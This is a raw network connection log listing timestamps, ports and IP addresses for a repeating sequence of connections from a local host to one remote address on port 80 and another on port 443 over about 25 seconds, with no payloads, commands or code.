Jan 10, 2025 22:31:58.506261110 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:58.510092020 CET	80	49999	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:58.510215998 CET	49999	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:58.511113882 CET	80	50001	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:58.511197090 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:58.511364937 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:58.516082048 CET	80	50001	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:59.215167046 CET	80	50001	132.226.247.73	192.168.2.3
Jan 10, 2025 22:31:59.216526985 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:59.216562033 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:59.216636896 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:59.216922045 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:59.216933966 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:59.266005039 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:31:59.842865944 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:59.844611883 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:59.844640970 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:31:59.844785929 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:31:59.844791889 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:00.211518049 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:00.211618900 CET	443	50002	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:00.211812019 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:00.212086916 CET	50002	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:00.215416908 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:00.216104031 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:00.220875025 CET	80	50003	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:00.220942974 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:00.220992088 CET	80	50001	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:00.221029043 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:00.221122980 CET	50001	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:00.225910902 CET	80	50003	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:00.918642044 CET	80	50003	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:00.920394897 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:00.920440912 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:00.921008110 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:00.921008110 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:00.921046019 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:00.969146013 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:01.557616949 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:01.559947014 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:01.559967995 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:01.560539961 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:01.560549021 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:02.065495968 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:02.065587044 CET	443	50004	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:02.065866947 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:02.066143036 CET	50004	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:02.069089890 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:02.070230961 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:02.074022055 CET	80	50003	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:02.074117899 CET	50003	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:02.075006008 CET	80	50005	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:02.075082064 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:02.075225115 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:02.080559969 CET	80	50005	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:02.769104004 CET	80	50005	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:02.785293102 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:02.785346031 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:02.785515070 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:02.789951086 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:02.789968967 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:02.812875032 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.398602962 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:03.401155949 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:03.401175022 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:03.401252031 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:03.401262999 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:03.695738077 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:03.695822954 CET	443	50006	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:03.696055889 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:03.696449041 CET	50006	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:03.699423075 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.700596094 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.705137968 CET	80	50005	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:03.705213070 CET	50005	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.705714941 CET	80	50007	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:03.705790043 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.705920935 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:03.711142063 CET	80	50007	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:04.397186995 CET	80	50007	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:04.398567915 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:04.398679018 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:04.398781061 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:04.399077892 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:04.399086952 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:04.441015005 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.012573004 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:05.014228106 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:05.014247894 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:05.014389992 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:05.014394999 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:05.323992014 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:05.324088097 CET	443	50008	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:05.324356079 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:05.324714899 CET	50008	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:05.328021049 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.329483032 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.332995892 CET	80	50007	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:05.334270000 CET	80	50009	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:05.334343910 CET	50007	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.334393978 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.339329958 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:05.344089985 CET	80	50009	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:06.012968063 CET	80	50009	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:06.015839100 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.015899897 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.016243935 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.016567945 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.016577005 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.062956095 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.623900890 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.626203060 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.626221895 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.626266003 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.626272917 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.842868090 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.842957973 CET	443	50010	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:06.843102932 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.843581915 CET	50010	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:06.847209930 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.847870111 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.852188110 CET	80	50009	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:06.852686882 CET	80	50011	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:06.852888107 CET	50009	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.852888107 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.854518890 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:06.859329939 CET	80	50011	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:07.542799950 CET	80	50011	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:07.544476032 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:07.544532061 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:07.544632912 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:07.544873953 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:07.544889927 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:07.594115019 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.184988022 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:08.186753035 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:08.186830997 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:08.186904907 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:08.186928988 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:08.522052050 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:08.522124052 CET	443	50012	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:08.522258043 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:08.522630930 CET	50012	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:08.526030064 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.527179003 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.531059980 CET	80	50011	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:08.531121969 CET	50011	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.531996012 CET	80	50013	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:08.532073975 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.532440901 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:08.537256002 CET	80	50013	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:09.204433918 CET	80	50013	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:09.207868099 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:09.207906008 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:09.207981110 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:09.208272934 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:09.208288908 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:09.250379086 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:09.812848091 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:09.814610958 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:09.814637899 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:09.814754009 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:09.814765930 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:10.028146982 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:10.028243065 CET	443	50014	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:10.028426886 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:10.038959026 CET	50014	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:10.179730892 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:10.183248997 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:10.185028076 CET	80	50013	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:10.185153008 CET	50013	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:10.188028097 CET	80	50015	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:10.188102961 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:10.218214035 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:10.223063946 CET	80	50015	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:10.861000061 CET	80	50015	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:10.862067938 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:10.862114906 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:10.862181902 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:10.862459898 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:10.862471104 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:10.922235966 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.483813047 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:11.486459017 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:11.486488104 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:11.486860991 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:11.486869097 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:11.703888893 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:11.703973055 CET	443	50016	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:11.704051971 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:11.704418898 CET	50016	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:11.707523108 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.708674908 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.712502956 CET	80	50015	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:11.712594032 CET	50015	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.713502884 CET	80	50017	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:11.713567972 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.713679075 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:11.718441010 CET	80	50017	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:12.395607948 CET	80	50017	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:12.396806955 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:12.396855116 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:12.396944046 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:12.397212029 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:12.397224903 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:12.437899113 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.010709047 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:13.012547016 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:13.012573004 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:13.012680054 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:13.012685061 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:13.305358887 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:13.305476904 CET	443	50018	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:13.305706024 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:13.305989027 CET	50018	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:13.308974981 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.310136080 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.314421892 CET	80	50017	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:13.314502954 CET	50017	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.315483093 CET	80	50019	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:13.315555096 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.315646887 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:13.320883036 CET	80	50019	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:14.010092974 CET	80	50019	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:14.011429071 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.011466026 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.011526108 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.011837006 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.011847019 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.062856913 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.618266106 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.622752905 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.622771978 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.625413895 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.625426054 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.921638966 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.921727896 CET	443	50020	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:14.921828032 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.922427893 CET	50020	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:14.925400972 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.926768064 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.930454016 CET	80	50019	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:14.930532932 CET	50019	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.931617022 CET	80	50021	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:14.931694031 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.931798935 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:14.937263966 CET	80	50021	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:15.622426987 CET	80	50021	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:15.623833895 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:15.623873949 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:15.623996019 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:15.624473095 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:15.624489069 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:15.672235012 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.248367071 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:16.250000954 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:16.250025988 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:16.250076056 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:16.250087976 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:16.558144093 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:16.558245897 CET	443	50022	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:16.558716059 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:16.559082031 CET	50022	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:16.562611103 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.564064980 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.567677975 CET	80	50021	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:16.567758083 CET	50021	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.568914890 CET	80	50023	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:16.569158077 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.569268942 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:16.574019909 CET	80	50023	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:17.241962910 CET	80	50023	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:17.243268967 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:17.243326902 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:17.243422985 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:17.243731976 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:17.243742943 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:17.297283888 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:17.869537115 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:17.871110916 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:17.871151924 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:17.871222973 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:17.871231079 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:18.201174021 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:18.201303959 CET	443	50024	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:18.201369047 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:18.201802015 CET	50024	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:18.215389013 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:18.216386080 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:18.220474005 CET	80	50023	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:18.220541000 CET	50023	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:18.221173048 CET	80	50025	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:18.221239090 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:18.221340895 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:18.226135969 CET	80	50025	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:18.901566982 CET	80	50025	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:18.903362989 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:18.903405905 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:18.903600931 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:18.903887987 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:18.903898954 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:18.953488111 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:19.519526958 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:19.521759033 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:19.521786928 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:19.521902084 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:19.521908045 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:20.147074938 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:20.147161961 CET	443	50026	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:20.147605896 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:20.148017883 CET	50026	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:20.151751041 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:20.152909040 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:20.156725883 CET	80	50025	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:20.156788111 CET	50025	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:20.157721043 CET	80	50027	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:20.157793999 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:20.157989025 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:20.162724018 CET	80	50027	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:20.920300961 CET	80	50027	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:20.921824932 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:20.921878099 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:20.921993017 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:20.922338009 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:20.922348022 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:20.969175100 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.544769049 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:21.566021919 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:21.566057920 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:21.566116095 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:21.566124916 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:21.894457102 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:21.894551039 CET	443	50028	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:21.894612074 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:21.899559975 CET	50028	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:21.902450085 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.903718948 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.907449007 CET	80	50027	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:21.907506943 CET	50027	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.908637047 CET	80	50029	132.226.247.73	192.168.2.3
